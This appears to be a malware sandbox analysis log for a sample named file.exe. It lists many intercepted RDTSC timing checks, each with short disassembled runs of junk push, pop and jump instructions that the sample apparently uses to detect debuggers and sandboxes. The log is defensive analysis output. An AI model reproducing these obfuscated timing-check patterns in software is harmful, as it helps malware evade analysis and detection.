                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F22A2 second address: 10F22DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnp 00007F05C12920B6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F05C12920C9h 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F05C12920BEh 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F22DE second address: 10F230F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502121h 0x00000007 jmp 00007F05C1502127h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7E10 second address: 10F7E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7E16 second address: 10F7E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F79B2 second address: 10F79B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F79B8 second address: 10F79BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F79BD second address: 10F79C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F05C12920B6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7B4C second address: 10F7B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110781F second address: 1107823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114379 second address: 111437F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111437F second address: 1114389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114389 second address: 1114393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F05C1502116h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114393 second address: 1114397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116C71 second address: 1116C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F05C150211Ch 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116C81 second address: 1116C95 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05C12920BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116C95 second address: 1116C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1116C99 second address: 1116C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FA8B second address: 112FA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05C150211Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F1DC second address: 112F1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F1E5 second address: 112F20C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F05C1502124h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F20C second address: 112F219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F05C12920B6h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F4C2 second address: 112F4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F64B second address: 112F651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11323C1 second address: 11323D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F05C1502116h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1132A06 second address: 1132A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135760 second address: 11357B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05C1502124h 0x00000009 jng 00007F05C1502116h 0x0000000f popad 0x00000010 jmp 00007F05C150211Dh 0x00000015 jmp 00007F05C1502128h 0x0000001a jg 00007F05C1502118h 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 js 00007F05C1502116h 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11357B8 second address: 1135803 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F05C12920C9h 0x0000000e jo 00007F05C12920B6h 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F05C12920BBh 0x0000001b jmp 00007F05C12920C1h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135803 second address: 1135807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0E61 second address: 4FF0E7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0E7F second address: 4FF0E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0E83 second address: 4FF0E9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0E9E second address: 4FF0EC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, ecx 0x0000000f mov ax, E815h 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0EC6 second address: 4FF0ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0ECC second address: 4FF0ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0ED0 second address: 4FF0EEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, 5Ch 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0EEC second address: 4FF0F02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0F02 second address: 4FF0F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0F09 second address: 4FF0F39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F05C150211Ch 0x00000013 sub cx, 06A8h 0x00000018 jmp 00007F05C150211Bh 0x0000001d popfd 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030B63 second address: 5030B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD00FF second address: 4FD0105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0105 second address: 4FD0109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0109 second address: 4FD0123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F05C150211Fh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0123 second address: 4FD015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F05C12920BEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, 0188D2D0h 0x0000001b mov eax, edx 0x0000001d popad 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD015E second address: 4FD0196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502122h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop eax 0x00000011 jmp 00007F05C1502129h 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0196 second address: 4FD01D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F05C12920BEh 0x00000011 push dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F05C12920C7h 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01D8 second address: 4FD01F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C1502124h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01F0 second address: 4FD01F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0C94 second address: 4FF0CBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05C1502127h 0x00000008 pop eax 0x00000009 mov ebx, 037DD85Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0CBD second address: 4FF0CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, cx 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0CC5 second address: 4FF0D0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05C1502126h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F05C1502127h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF082F second address: 4FF0847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0847 second address: 4FF084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF084B second address: 4FF0865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0865 second address: 4FF08CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05C1502121h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F05C1502121h 0x0000000f jmp 00007F05C150211Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F05C1502126h 0x0000001e mov ebp, esp 0x00000020 jmp 00007F05C1502120h 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08CB second address: 4FF08E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF06FE second address: 4FF0745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05C150211Eh 0x00000008 pop ecx 0x00000009 jmp 00007F05C150211Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov eax, 4946177Bh 0x00000018 movzx eax, dx 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F05C1502129h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0745 second address: 4FF078E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov edx, 53F9F70Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movsx edi, si 0x00000013 pushfd 0x00000014 jmp 00007F05C12920BCh 0x00000019 add ah, 00000058h 0x0000001c jmp 00007F05C12920BBh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F05C12920C5h 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF078E second address: 4FF079E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C150211Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF079E second address: 4FF07A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF050E second address: 4FF0512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0512 second address: 4FF052F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000214 second address: 500021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500021A second address: 500021E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010208 second address: 50102C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502121h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05C150211Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx ebx, ax 0x00000014 mov si, 03D9h 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b movzx eax, bx 0x0000001e push edi 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F05C150211Fh 0x0000002a mov eax, dword ptr [ebp+08h] 0x0000002d jmp 00007F05C1502126h 0x00000032 and dword ptr [eax], 00000000h 0x00000035 jmp 00007F05C1502120h 0x0000003a and dword ptr [eax+04h], 00000000h 0x0000003e pushad 0x0000003f mov al, 73h 0x00000041 pushfd 0x00000042 jmp 00007F05C1502123h 0x00000047 adc cl, FFFFFFBEh 0x0000004a jmp 00007F05C1502129h 0x0000004f popfd 0x00000050 popad 0x00000051 pop ebp 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F05C150211Dh 0x00000059 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF064A second address: 4FF0667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0667 second address: 4FF0677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C150211Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0677 second address: 4FF0694 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov si, 17FBh 0x00000012 push eax 0x00000013 push edx 0x00000014 movzx ecx, bx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000E01 second address: 5000E7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502125h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 87h 0x0000000d mov ch, bh 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F05C150211Bh 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F05C1502126h 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f movzx eax, di 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F05C1502121h 0x0000002d xor ecx, 18671446h 0x00000033 jmp 00007F05C1502121h 0x00000038 popfd 0x00000039 mov di, si 0x0000003c popad 0x0000003d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000E7D second address: 5000E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503007B second address: 5030127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05C150211Fh 0x00000008 mov esi, 5B06CECFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 jmp 00007F05C1502122h 0x00000017 xchg eax, ecx 0x00000018 jmp 00007F05C1502120h 0x0000001d push eax 0x0000001e pushad 0x0000001f movsx edi, ax 0x00000022 pushfd 0x00000023 jmp 00007F05C150211Ah 0x00000028 or ecx, 70163BD8h 0x0000002e jmp 00007F05C150211Bh 0x00000033 popfd 0x00000034 popad 0x00000035 xchg eax, ecx 0x00000036 jmp 00007F05C1502126h 0x0000003b mov eax, dword ptr [76FB65FCh] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F05C150211Dh 0x00000049 sbb si, 0626h 0x0000004e jmp 00007F05C1502121h 0x00000053 popfd 0x00000054 mov esi, 2F09B357h 0x00000059 popad 0x0000005a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030127 second address: 5030149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05C12920BDh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030149 second address: 503019C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502121h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F063340591Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007F05C1502129h 0x0000001a adc eax, 6EB03246h 0x00000020 jmp 00007F05C1502121h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503019C second address: 50301D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007F05C12920BEh 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F05C12920BCh 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50301D2 second address: 503021F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 35AED1F4h 0x00000008 movsx ebx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and ecx, 1Fh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F05C1502122h 0x00000018 jmp 00007F05C1502125h 0x0000001d popfd 0x0000001e call 00007F05C1502120h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50302D4 second address: 50302DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50302DA second address: 50302DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50302DE second address: 503031D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cx, E8FBh 0x00000011 pushfd 0x00000012 jmp 00007F05C12920C0h 0x00000017 or ah, 00000048h 0x0000001a jmp 00007F05C12920BBh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503031D second address: 5030321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030321 second address: 5030327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030327 second address: 503034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F05C1502129h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503034F second address: 5030353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030353 second address: 5030357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030357 second address: 503035D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503035D second address: 5030363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030363 second address: 5030367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
